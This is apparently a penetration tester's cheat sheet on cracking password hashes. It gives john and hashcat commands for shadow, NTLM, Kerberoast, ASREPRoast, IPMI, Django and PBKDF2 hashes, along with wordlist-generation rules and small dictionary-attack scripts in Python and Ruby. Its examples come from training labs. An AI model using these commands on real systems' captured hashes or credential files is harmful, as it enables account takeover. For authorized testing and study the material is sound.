Hashes

Online Databases

• LM, NTLM, md2, md4, md5, md5(md5_hex), md5-half, sha1, sha224, sha256, sha384, sha512, ripeMD160, whirlpool, MySQL 4.1+ (sha1(sha1_bin)), QubesV3.1BackupDefaults

CrackStation - Online Password Hash Cracking - MD5, SHA1, Linux, Rainbow Tables, etc.crackstation.net

CrackStation

• NT Hash (SAM)

NTLM to plaintext password lookupNTLM.PW

NTLM.PW

Pull Hashes Decryption From Online Sources

GitHub - Adkali/Hashget: Pull Hashes Decryption From Online Sources Using PythonGitHub

Unix password

/etc/shadow

cry0l1t3	:	$6$wBRzy$...SNIP...x9cDWUxW1	:	18937	:	0	:	99999	:	7	:	:	:
Username		Encrypted password		Last PW change		Min. PW age		Max. PW age		Warning period	Inactivity period	Expiration date	Unused

$<type>$<salt>$<hashed>

ID	Cryptographic Hash Algorithm
$1$	MD5
$2a$	Blowfish
$2y$	Eksblowfish
$5$	SHA-256
$6$	SHA-512
$sha1$	SHA1crypt
$y$	Yescrypt
$gy$	Gost-yescrypt
$7$	Scrypt
$argon2i$...	Argon2

Crack /etc/shadow hashes

cat hash             
user:$1$CrackMe$U93**********UP9iUxGVIvq/:18439:0:99999:7:::

john hash --wordlist=/usr/share/wordlists/rockyou.txt

Hash Identifier

GitHub - psypanda/hashID: Software to identify the different types of hashes -GitHub

apt install hashid

hashid --john 22edc41d491015e81f67da568fb2726cf739c42b2974d32d2f41163af4ccb1a3

GitHub - blackploit/hash-identifier: Software to identify the different types of hashes used to encrypt data and especially passwordsGitHub

Hash-Identifier

GitHub - noraj/haiti: :key: Hash type identifier (CLI & lib)GitHub

Online:

Hash Type Identifier - Identify unknown hasheshashes.com

root:x:0:0:root:/root:/bin/bash

See Privilege escalation - Linux

Linux

/etc/passwd

$ cat /etc/passwd

...SNIP...
htb-student:x:1000:1000:,,,:/home/htb-student:/bin/bash

htb-student:	x:	1000:	1000:	,,,:	/home/htb-student:	/bin/bash
<username>:	<password>:	<uid>:	<gid>:	<comment>:	<home directory>:	<cmd executed after logging in>
Cracking Linux Credentials

Unshadow

$ sudo cp /etc/passwd /tmp/passwd.bak 
$ sudo cp /etc/shadow /tmp/shadow.bak 
$ unshadow /tmp/passwd.bak /tmp/shadow.bak > /tmp/unshadowed.hashes

hashcat -m 1800 -a 0 /tmp/unshadowed.hashes rockyou.txt -o /tmp/unshadowed.cracked

Create custom password list

Username listsPassword lists

PassGAN

GitHub - brannondorsey/PassGAN: A Deep Learning Approach for Password Guessing (https://arxiv.org/abs/1709.00440)GitHub

Bash

for i in $(cat pwlist.txt); do echo $i; echo ${i}2019; echo ${i}2020; done > pwd.txt

kwprocessor

GitHub - hashcat/kwprocessor: Advanced keyboard-walk generator with configureable basechars, keymap and routesGitHub

Hashcat generating rule-based Wordlist

$ cat custom.rule

:
c
so0
c so0
sa@
c sa@
c sa@ so0
$!
$! c
$! so0
$! sa@
$! c so0
$! c sa@
$! so0 sa@
$! c so0 sa@

$ hashcat --force password.list -r custom.rule --stdout | sort -u > mut_password.list
$ cat mut_password.list

password
Password
passw0rd
Passw0rd
p@ssword
P@ssword
P@ssw0rd
password!
Password!
passw0rd!
p@ssword!
Passw0rd!
P@ssword!
p@ssw0rd!
P@ssw0rd!

Hashcat Existing Rules

$ ls /usr/share/hashcat/rules/

best64.rule                  specific.rule
combinator.rule              T0XlC-insert_00-99_1950-2050_toprules_0_F.rule
d3ad0ne.rule                 T0XlC-insert_space_and_special_0_F.rule
dive.rule                    T0XlC-insert_top_100_passwords_1_G.rule
generated2.rule              T0XlC.rule
generated.rule               T0XlCv1.rule
hybrid                       toggles1.rule
Incisive-leetspeak.rule      toggles2.rule
InsidePro-HashManager.rule   toggles3.rule
InsidePro-PasswordsPro.rule  toggles4.rule
leetspeak.rule               toggles5.rule
oscommerce.rule              unix-ninja-leetspeak.rule
rockyou-30000.rule

Try best64.rule first

OneRuleToRuleThemAll

One Rule to Rule Them AllNotSoSecure

GitHub - NotSoSecure/password_cracking_rules: One rule to crack all passwords. or atleast we hope so.GitHub

hashcat --attack-mode 0 --rules-file OneRuleToRuleThemAll.rule --hash-type 1000 hash /usr/share/wordlists/rockyou.txt

Crunch

Wordlist Generator using Crunch [6 Methods] | GoLinuxCloudGoLinuxCloud

Password lists

Cupp

GitHub - Mebus/cupp: Common User Passwords Profiler (CUPP)GitHub

Password lists

CeWL

$ cewl https://www.inlanefreight.com -d 4 -m 6 --lowercase -w inlane.wordlist
$ wc -l inlane.wordlist

326

Password lists

Improve the custom wordlist

As we all know few password are just simple words. Many use numbers and special characters. To improve our password list we can use john the ripper. We can input our own rules, or we can just use the standard john-the-ripper rules

john ---wordlist=inlane.wordlist --rules --stdout > wordlist-modified.txt

Source: https://github.com/lamontns/pentest/blob/master/password-related-attacks/generating-custom-password-lists.md

Rainbow Tables - SHA1

List of Rainbow Tablesproject-rainbowcrack.com

https://www.kalilinux.in/2021/03/rainbow-tables-rainbowcrack-kali-linux.html?m=1www.kalilinux.in

Ethical-Hacking-Labs/5-System-Hacking/3-Rainbow-tables.md at master · Samsar4/Ethical-Hacking-LabsGitHub

RainbowCrack

VM - VMWare and VirtualBox encryption

GitHub - archidote/VM-Password-Extractor: This tool aims to enhance current projects by extracting cryptographic data and potentially decrypting VM and VirtualBox encryption. It consolidates multiple scattered web-based mini-projects, streamlining discoveries into a centralized tool for easier access and utilization.GitHub

John The Ripper

$ john --format=<hash_type> <hash or hash_file>

John will output the cracked passwords to the console and the file "john.pot" (~/.john/john.pot) to the current user's home directory.

Hash Format	Example Command	Description
afs	john --format=afs hashes_to_crack.txt	AFS (Andrew File System) password hashes
bfegg	john --format=bfegg hashes_to_crack.txt	bfegg hashes used in Eggdrop IRC bots
bf	john --format=bf hashes_to_crack.txt	Blowfish-based crypt(3) hashes
bsdi	john --format=bsdi hashes_to_crack.txt	BSDi crypt(3) hashes
crypt(3)	john --format=crypt hashes_to_crack.txt	Traditional Unix crypt(3) hashes
des	john --format=des hashes_to_crack.txt	Traditional DES-based crypt(3) hashes
dmd5	john --format=dmd5 hashes_to_crack.txt	DMD5 (Dragonfly BSD MD5) password hashes
dominosec	john --format=dominosec hashes_to_crack.txt	IBM Lotus Domino 6/7 password hashes
EPiServer SID hashes	john --format=episerver hashes_to_crack.txt	EPiServer SID (Security Identifier) password hashes
hdaa	john --format=hdaa hashes_to_crack.txt	hdaa password hashes used in Openwall GNU/Linux
hmac-md5	john --format=hmac-md5 hashes_to_crack.txt	hmac-md5 password hashes
hmailserver	john --format=hmailserver hashes_to_crack.txt	hmailserver password hashes
ipb2	john --format=ipb2 hashes_to_crack.txt	Invision Power Board 2 password hashes
krb4	john --format=krb4 hashes_to_crack.txt	Kerberos 4 password hashes
krb5	john --format=krb5 hashes_to_crack.txt	Kerberos 5 password hashes
LM	john --format=LM hashes_to_crack.txt	LM (Lan Manager) password hashes
lotus5	john --format=lotus5 hashes_to_crack.txt	Lotus Notes/Domino 5 password hashes
mscash	john --format=mscash hashes_to_crack.txt	MS Cache password hashes
mscash2	john --format=mscash2 hashes_to_crack.txt	MS Cache v2 password hashes
mschapv2	john --format=mschapv2 hashes_to_crack.txt	MS CHAP v2 password hashes
mskrb5	john --format=mskrb5 hashes_to_crack.txt	MS Kerberos 5 password hashes
mssql05	john --format=mssql05 hashes_to_crack.txt	MS SQL 2005 password hashes
mssql	john --format=mssql hashes_to_crack.txt	MS SQL password hashes
mysql-fast	john --format=mysql-fast hashes_to_crack.txt	MySQL fast password hashes
mysql	john --format=mysql hashes_to_crack.txt	MySQL password hashes
mysql-sha1	john --format=mysql-sha1 hashes_to_crack.txt	MySQL SHA1 password hashes
NETLM	john --format=netlm hashes_to_crack.txt	NETLM (NT LAN Manager) password hashes
NETLMv2	john --format=netlmv2 hashes_to_crack.txt	NETLMv2 (NT LAN Manager version 2) password hashes
NETNTLM	john --format=netntlm hashes_to_crack.txt	NETNTLM (NT LAN Manager) password hashes
NETNTLMv2	john --format=netntlmv2 hashes_to_crack.txt	NETNTLMv2 (NT LAN Manager version 2) password hashes
NEThalfLM	john --format=nethalflm hashes_to_crack.txt	NEThalfLM (NT LAN Manager) password hashes
md5ns	john --format=md5ns hashes_to_crack.txt	md5ns (MD5 namespace) password hashes
nsldap	john --format=nsldap hashes_to_crack.txt	nsldap (OpenLDAP SHA) password hashes
ssha	john --format=ssha hashes_to_crack.txt	ssha (Salted SHA) password hashes
NT	john --format=nt hashes_to_crack.txt	NT (Windows NT) password hashes
openssha	john --format=openssha hashes_to_crack.txt	OPENSSH private key password hashes
oracle11	john --format=oracle11 hashes_to_crack.txt	Oracle 11 password hashes
oracle	john --format=oracle hashes_to_crack.txt	Oracle password hashes
pdf	john --format=pdf hashes_to_crack.txt	PDF (Portable Document Format) password hashes
phpass-md5	john --format=phpass-md5 hashes_to_crack.txt	PHPass-MD5 (Portable PHP password hashing framework) password hashes
phps	john --format=phps hashes_to_crack.txt	PHPS password hashes
pix-md5	john --format=pix-md5 hashes_to_crack.txt	Cisco PIX MD5 password hashes
po	john --format=po hashes_to_crack.txt	Po (Sybase SQL Anywhere) password hashes
rar	john --format=rar hashes_to_crack.txt	RAR (WinRAR) password hashes
raw-md4	john --format=raw-md4 hashes_to_crack.txt	Raw MD4 password hashes
raw-md5	john --format=raw-md5 hashes_to_crack.txt	Raw MD5 password hashes
raw-md5-unicode	john --format=raw-md5-unicode hashes_to_crack.txt	Raw MD5 Unicode password hashes
raw-sha1	john --format=raw-sha1 hashes_to_crack.txt	Raw SHA1 password hashes
raw-sha224	john --format=raw-sha224 hashes_to_crack.txt	Raw SHA224 password hashes
raw-sha256	john --format=raw-sha256 hashes_to_crack.txt	Raw SHA256 password hashes
raw-sha384	john --format=raw-sha384 hashes_to_crack.txt	Raw SHA384 password hashes
raw-sha512	john --format=raw-sha512 hashes_to_crack.txt	Raw SHA512 password hashes
salted-sha	john --format=salted-sha hashes_to_crack.txt	Salted SHA password hashes
sapb	john --format=sapb hashes_to_crack.txt	SAP CODVN B (BCODE) password hashes
sapg	john --format=sapg hashes_to_crack.txt	SAP CODVN G (PASSCODE) password hashes
sha1-gen	john --format=sha1-gen hashes_to_crack.txt	Generic SHA1 password hashes
skey	john --format=skey hashes_to_crack.txt	S/Key (One-time password) hashes
ssh	john --format=ssh hashes_to_crack.txt	SSH (Secure Shell) password hashes
sybasease	john --format=sybasease hashes_to_crack.txt	Sybase ASE password hashes
xsha	john --format=xsha hashes_to_crack.txt	xsha (Extended SHA) password hashes
zip	john --format=zip hashes_to_crack.txt	ZIP (WinZip) password hashes

john --wordlist=<wordlist_file> --rules <hash_file>

John - Incremental mode

John - SHA-256

john --format=sha256 hashes_to_crack.txt

John - /etc/shadow - SHA-512

┌─[xor@parrot]─[~/Téléchargements]
└──╼ $ls
passwd  rockyou.txt  rockyou.txt.bz2  shadow
┌─[xor@parrot]─[~/Téléchargements]
└──╼ $unshadow passwd shadow > mypasswd
┌─[xor@parrot]─[~/Téléchargements]
└──╼ $john --wordlist=rockyou.txt mypasswd
Warning: detected hash type "sha512crypt", but the string is also recognized as "HMAC-SHA256"
Use the "--format=HMAC-SHA256" option to force loading these as that type instead
Using default input encoding: UTF-8
Loaded 1 password hash (sha512crypt, crypt(3) $6$ [SHA512 128/128 SSE2 2x])
Cost 1 (iteration count) is 5000 for all loaded hashes
Will run 2 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
password1        (root)
1g 0:00:00:01 DONE (2019-08-21 15:20) 0.9615g/s 123.0p/s 123.0c/s 123.0C/s 123456..diamond
Use the "--show" option to display all of the cracked passwords reliably
Session completed

John - SSH Private Key - RSA

root@Host-001:~/Bureau# vim id_rsa 
root@Host-001:~/Bureau# python /usr/share/john/ssh2john.py id_rsa > id_rsa_hash.txt
root@Host-001:~/Bureau# john --wordlist=/usr/share/wordlists/rockyou.txt id_rsa_hash.txt

John - Windows NTLM

hashdump format = User Name: RID: LM-HASH Value: NT-HASH value

john hash /usr/share/wordlists/rockyou.txt --format=NT

https://weakpass.com/pre-computed

John - ASREPRoast

john.exe --wordlist=C:\path\to\10k-worst-pass.txt C:\path\to\asrephashes.txt

John - Password Safe - psafe3 file

Password Safepwsafe.org

# /opt/tools/john/run/pwsafe2john.py Backup.psafe3 > backup.hash
# john backup.hash --wordlist=/usr/share/wordlists/rockyou.txt

Hashcat

Hashcat - Generic hash types

https://hashcat.net/wiki/doku.php?id=example_hasheshashcat.net

hashcat --example-hashes | less

Crunch Wordlist Generator - Create Single Characters

Crunch Wordlist Generator - Create Single Characterssecf00tprint.github.io

crunch 12 12 -f "/usr/share/crunch/charset.lst" mixalpha-numeric-all -t abracadabra@

With bash:

for i in {1..20}; do echo "password$i"; done

SHA1

echo 'd033e22ae348aeb5660fc2140aec35850c4da997' > admin_hash_sha1.txt 

hashcat --hash-type 100 --attack-mode 0 admin_hash_sha1.txt /usr/share/wordlists/rockyou.txt

Wordpress - Phpass - $P$

hashcat -m 400 phpass.hash /usr/share/wordlists/rockyou.txt

sha512crypt $6$, SHA512 (Unix) - /etc/shadow

$6$52450745$k5ka2p8bFuSmoVT1tzOyyuaREkkKBcCNqoDKzYiJL9RaE8yMnPgh2XzzF0NDrUhgrcLwg78xs1w5pJiypEdFX/ 

hashcat --hash-type 1800 --attack-mode 0 michael.hash /usr/share/wordlists/rockyou.txt

IPMI

IPMI (623 UDP)

General

• http://fish2.com/ipmi/remote-pw-cracking.html

• https://gbe0.com/posts/security/cracking-ipmi-passwords/

• Tool

GitHub - c0rnf13ld/ipmiPwner: Exploit to dump ipmi hashesGitHub

hashcat -m 7300 ipmi.txt

python3 ipmipwner.py --host 10.129.154.218 -u admin -c python -pW /usr/share/wordlists/rockyou.txt -oH hash -oC crackedHash

HP iLO

hashcat -m 7300 ipmi.txt -a 3 ?1?1?1?1?1?1?1?1 -1 ?d?u

Exegol:

hashcat -m 7300 ipmi.txt -a 3 '\?1\?1\?1\?1\?1\?1\?1\?1' -1 '?d?u'

SAM - NT hash

$ sudo vim hashestocrack.txt

64f12cddaa88057e06a81b54e73b949b
31d6cfe0d16ae931b73c59d7e0c089c0
6f8c3f4d3869a10f3b4f0522f537fd33
184ecdda8cf1dd238d438c4aea4d560d
f7eb9c06fafaa23c4bcf22ba6781c1e2

sudo hashcat -m 1000 hashestocrack.txt /usr/share/wordlists/rockyou.txt

Online

NTLM to plaintext password lookupNTLM.PW

MD5

hashcat -m 500 -a 0 md5-hashes.list rockyou.txt

Mysql bcrypt Blowfish (Unix) $2*$

MySQL (3306)

echo '$2y$10$IT4k5kmSGvHSO9d6M/1w0eYiB5Ne9XzArQRFJTGThNiy/yBtkIj12' > hash           

hashcat --hash-type 3200 --attack-mode 0 hash `fzf-wordlists`

NTMLv2 - Responder

LLMNR NBT-NS Poisoning

[SMB] NTLMv2-SSP Hash     : mssqlsvc::WIN-02:1122334455667788:67469E50D72CBD81C0555BA21EBEB8E2:010100000000000000A3B0E53898DA01B9CD8682359BA70F0000000002000800460030004100470001001E00570049004E002D004600490037003800360032004B00420052004F00500004003400570049004E002D004600490037003800360032004B00420052004F0050002E0046003000410047002E004C004F00430041004C000300140046003000410047002E004C004F00430041004C000500140046003000410047002E004C004F00430041004C000700080000A3B0E53898DA0106000400020000000800300030000000000000000000000000300000182E238D049AA0230066AE7B95F47CA65F370AC3AD06C2810BBFBB25BE72ACFD0A001000000000000000000000000000000000000900200063006900660073002F00310030002E00310030002E00310034002E00390036000000000000000000
exit
[+] Exiting...

hashcat -m 5600 mssqlsvc_hash passwords.list 

Kerberoast - SPN

Kerberoast

$krb5tgs$23$*: RC4 (type 23) encrypted ticket

$krb5tgs$18$*: AES-256 (Type 18)

While it is possible to crack AES-128 (type 17) and AES-256 (type 18) TGS tickets using Hashcat, it will typically be significantly more time consuming than cracking an RC4 (type 23) encrypted ticket

$krb5tgs$23$

hashcat -m 13100 sqldev_tgs /usr/share/wordlists/rockyou.txt 

If extracted with Mimikatz - Also see Internal Pentest - Kerberoast

python2.7 kirbi2john.py sqldev.kirbi

This will create a file called crack_file.

sed 's/\$krb5tgs\$\(.*\):\(.*\)/\$krb5tgs\$23\$\*\1\*\$\2/' crack_file > sqldev_tgs_hashcat

hashcat -m 13100 sqldev_tgs_hashcat /usr/share/wordlists/rockyou.txt 

$krb5tgs$18$

hashcat -m 19700 aes_to_crack /usr/share/wordlists/rockyou.txt

ASREPRoast

Misconfiguration

hashcat -m 18200 ilfreight_asrep /usr/share/wordlists/rockyou.txt 

MsCacheV2 - DDC2

// hashcat format
$DCC2$10240#username#7afec****************6d0c

hashcat64 -a 0 -m 2100 -r /usr/share/hashcat/rules/best64.rule mscachev2.txt passwords\*

Convert NetNTLMv1 to NTLM - PTH or Crack

Online

shuck.sh | Shuck hash before trying to crack itshuck.sh

Hash NT obtained - try to break it

NTLM to plaintext password lookupNTLM.PW

NTLMv1 Multitool

GitHub - evilmog/ntlmv1-multi: NTLMv1 MultitoolGitHub

https://raw.githubusercontent.com/brannondorsey/naive-hashcat/refs/heads/master/hashcat-3.6.0/charsets/DES_full.charsetraw.githubusercontent.com

$ python3 ntlmv1-multi/ntlmv1.py --ntlmv1 'DEV$::HTB:11EBE0BFBF241EE1D55DD9F5535254FCAF77876B9D200341:11EBE0BFBF241EE1D55DD9F5535254FCAF77876B9D200341:1122334455667788' 
Hashfield Split:
['DEV$', '', 'HTB', '11E<-SNIP->341', '11EBE0BF<-SNIP->876B9D200341', '1122334455667788']

Hostname: HTB
Username: DEV$
Challenge: 1122334455667788
LM Response: 11EBE<-SNIP->200341
NT Response: 11EBE<-SNIP->77876B9D200341
CT1: 11E<-SNIP->41EE1
CT2: D55<-SNIP->254FC
CT3: AF7<-SNIP->00341

To Calculate final 4 characters of NTLM hash use:
./ct3_to_ntlm.bin AF7<-SNIP->00341 1122334455667788

To crack with hashcat create a file with the following contents:
11<-SNIP->EE1:1122334455667788
D5<-SNIP->5254FC:1122334455667788

echo "11EB<-SNIP->E1:1122334455667788">>14000.hash
echo "D55D<-SNIP->254FC:1122334455667788">>14000.hash

To crack with hashcat:
./hashcat -m 14000 -a 3 -1 charsets/DES_full.charset --hex-charset 14000.hash ?1?1?1?1?1?1?1?1

$ echo "11EB<-SNIP->E1:1122334455667788">>14000.hash
$ echo "D55D<-SNIP->254FC:1122334455667788">>14000.hash
$ hashcat -m 14000 -a 3 -1 DES_full.charset --hex-charset 14000.hash '?1?1?1?1?1?1?1?1'

Other script

https://gist.github.com/coldfusion39/96471ce386a4956b49966f97f9d98af4gist.github.com

https://raw.githubusercontent.com/brannondorsey/naive-hashcat/refs/heads/master/hashcat-3.6.0/charsets/DES_full.charsetraw.githubusercontent.com

$ python deskey_to_ntlm.py --hash dev.hash
[+] CT1 key: 11e<-SNIP->41ee1
[+] CT2 key: d55<-SNIP->1ee1

hashcat -m 14000 des_keys.txt -o des_keys.out -a 3 -1 charsets/DES_full.charset --hex-charset ?1?1?1?1?1?1?1?1 -w 3

$ wget https://raw.githubusercontent.com/brannondorsey/naive-hashcat/refs/heads/master/hashcat-3.6.0/charsets/DES_full.charset
$ hashcat -m 14000 des_keys.txt -o des_keys.out -a 3 -1 DES_full.charset --hex-charset '?1?1?1?1?1?1?1?1' -w 3

pbkdf2

GitHub - kxcode/KrackerGo: PBKDF2 SHA256 Hash Cracker for GogsGitHub

https://exploit-notes.hdks.org/exploit/cryptography/key-derivation-function/pbkdf2/exploit-notes.hdks.org

algo : pbkdf2$50000$50 >> 50000 iterations, salt length 50

Hashcat format:

sha256:<iterations>:<salt_b64>:<hash_b64>

# echo -n '97907280dc24fe517c43475bd218bfad56c25d4d11037d8b6da440efd4d691adfead40330b2aa6aaf1f33621d0d73228fc16' | base64
OTc5MDcyODBkYzI0ZmU1MTdjNDM0NzViZDIxOGJmYWQ1NmMyNWQ0ZDExMDM3ZDhiNmRhNDQwZWZk
NGQ2OTFhZGZlYWQ0MDMzMGIyYWE2YWFmMWYzMzYyMWQwZDczMjI4ZmMxNg==

# echo -n 'd7cf2c96277dd16d95ed5c33bb524b62' | base64         
ZDdjZjJjOTYyNzdkZDE2ZDk1ZWQ1YzMzYmI1MjRiNjI=

# cat emily.hash
sha256:50000:ZDdjZjJjOTYyNzdkZDE2ZDk1ZWQ1YzMzYmI1MjRiNjI=:OTc5MDcyODBkYzI0ZmU1MTdjNDM0NzViZDIxOGJmYWQ1NmMyNWQ0ZDExMDM3ZDhiNmRhNDQwZWZkNGQ2OTFhZGZlYWQ0MDMzMGIyYWE2YWFmMWYzMzYyMWQwZDczMjI4ZmMxNg==
# hashcat -m 10900 emily.hash /usr/share/wordlists/rockyou.txt

Or python script

import hashlib
import binascii

def pbkdf2_hash(password, salt, iterations=50000, dklen=50):

    hash_value = hashlib.pbkdf2_hmac(

        'sha256',

        password.encode('utf-8'),

        salt,

        iterations,

        dklen

    )

    return hash_value

def find_matching_password(dictionary_file, target_hash, salt, iterations=50000, dklen=50):

    target_hash_bytes = binascii.unhexlify(target_hash)

    with open(dictionary_file, 'r', encoding='utf-8') as file:

        for line in file:

            password = line.strip()

            hash_value = pbkdf2_hash(password, salt, iterations, dklen)

            if hash_value == target_hash_bytes:

                print(f"Found password: {password}")

                return password

    print("Password not found.")

    return None

salt = binascii.unhexlify('227d873cca89103cd83a976bdac52486')

target_hash = '97907280dc24fe517c43475bd218bfad56c25d4d11037d8b6da440efd4d691adfead40330b2aa6aaf1f33621d0d73228fc16'

dictionary_file = '200worstpass.txt'

find_matching_password(dictionary_file, target_hash, salt)

Werkzeug hash

pbkdf2:sha256:600000

GitHub - AnataarXVI/Werkzeug-Cracker: Werkzeug password crackerGitHub

Django hash - pbkdf2_sha256$20000$

hashcat -m 10000 --force django.hash /usr/share/wordlists/rockyou.txt 

GitHub - xros/py_django_crack: Crack the django password on the way. By default Django use pbkdf2 and sha256 method to encrypt user's password. Once get the password stored in the database table, you need to compare it with others if brute force cracking. It is recommended that you use hash table comparison. The tool 'rainbow crack' can generate rainbow hash tables while another tool 'hashcat' brute-force cracks password from a dictionary alive. Because django uses PBKDF2(Password-Based Key Derivation Function), it would take too long to generate a password.GitHub

Grafana hashes

GitHub - iamaldi/grafana2hashcat: Python script that converts Grafana hash digests to PBKDF2_HMAC_SHA256 format in order to facilitate password cracking using Hashcat.GitHub

Cracking SSH private key

How to crack encrypted SSH private keys?Centre d'expertises en cybersécurité

deNaive (script)

require 'open3'

if ARGV.size == 2
  password_found = false

  File.readlines(ARGV[1], chomp: true).each do |password|
    Open3.popen3("ssh-keygen -y -f #{ARGV[0]} -P '#{password}'") { |i,o,e,t|
      error = e.read.chomp
      if error.empty?
        puts "\nThe password is: #{password}"
        password_found = true
      elsif /incorrect passphrase supplied to decrypt private key/.match?(error)
        print '.'
      else
        puts "Error: #{t.value}"
        puts error
      end
    }
    break if password_found
  end
else
  puts "Usage  : ruby #{__FILE__} SSH_KEY WORDLIST"
  puts "Example: ruby #{__FILE__} ~/.ssh/id_ed25519_crack /usr/share/wordlists/passwords/richelieu-french-top20000.txt"
end

ruby ssh-bf.rb ~/.ssh/id_ed25519_crack /usr/share/wordlists/passwords/richelieu-french-top20000.txt

John

$ ssh2john ~/.ssh/id_ed25519_crack > /tmp/hash_jtr.txt
$ john /tmp/hash_jtr.txt -w=/usr/share/wordlists/passwords/richelieu-french-top20000.txt --format=ssh